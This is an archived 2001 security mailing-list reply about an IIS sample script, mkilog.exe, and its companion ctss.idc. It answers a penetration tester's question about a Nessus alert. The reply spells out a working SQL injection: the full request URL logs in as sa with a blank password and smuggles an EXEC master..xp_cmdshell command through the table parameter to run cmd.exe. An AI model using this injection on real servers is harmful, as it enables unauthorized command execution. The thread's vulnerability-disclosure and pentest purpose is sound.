Re: Information about /scripts/toos/mkilog.exe

From: H D Moore (hdmat_private)
Date: Tue Jul 31 2001 - 10:50:23 PDT

Next message: bluefur0r bluefur0r: "null.idq/ida exploit code for US?"

Previous message: Blake Frantz: "Re: packetstorm.securify.com down?"
In reply to: César González: "Information about /scripts/toos/mkilog.exe"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

mkilog.exe simply posts data to ctss.idc, which creates  a table based on the 
parameters it gets:

[ctss.idc]
Datasource: %ds%
Username: %user%
Password: %pwd%
Template: ct.htx
SQLStatement:
+create table %table% (
+ClientHost varchar(50), username varchar(50),
+LogTime datetime, service varchar( 20), machine varchar( 20),
+serverip varchar( 50), processingtime int, bytesrecvd int,
+bytessent int, servicestatus int, win32status int,
+operation varchar( 200), target varchar(200), parameters text )

If you pass a correct DataSource, User, and Password (LocalServer, sa, blank 
password for locally installed servers), then change the table to:

bogustable(bleh int); EXEC master..xp_cmdshell("cmd.exe /c echo 0wned");--

You can use it to run system commands.  In this case, the actual query you 
would send is (lines probably wrapped):

/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=bogustable(bleh 
int);EXEC+master..xp_cmdshell("cmd.exe+/c echo+0wned");--

For every query you run you have to create another garbage table, so remeber 
to cleanup all those bogus tables when you are done.

For some reason SQL Server 6.5 limits your command parameter to 30 characters 
when executed this way (which is _really_ annoying), I haven't been able to 
track down why yet.  Goodluck!

-HD

http://www.digitaloffense.net (play)
http://www.digitaldefense.net (work)


On Tuesday 31 July 2001 06:48 am, César González wrote:
> Hello all,
>
> I am making a penetration testing, and some vulnerability scanners alert
> about the script mkilog.exe. Most exactly nessus said the following :
>
>     The CGI /scripts/tools/mkilog.exe is present.
>
>     This CGI allows an attacker to view and modify SQL database
>     contents.
>
> No securityfocus links, CVE advisory, etc. i have search most popular
> security search engines but nothing appears. Any help will be appreciated.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: bluefur0r bluefur0r: "null.idq/ida exploit code for US?"
Previous message: Blake Frantz: "Re: packetstorm.securify.com down?"
In reply to: César González: "Information about /scripts/toos/mkilog.exe"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 31 2001 - 15:19:31 PDT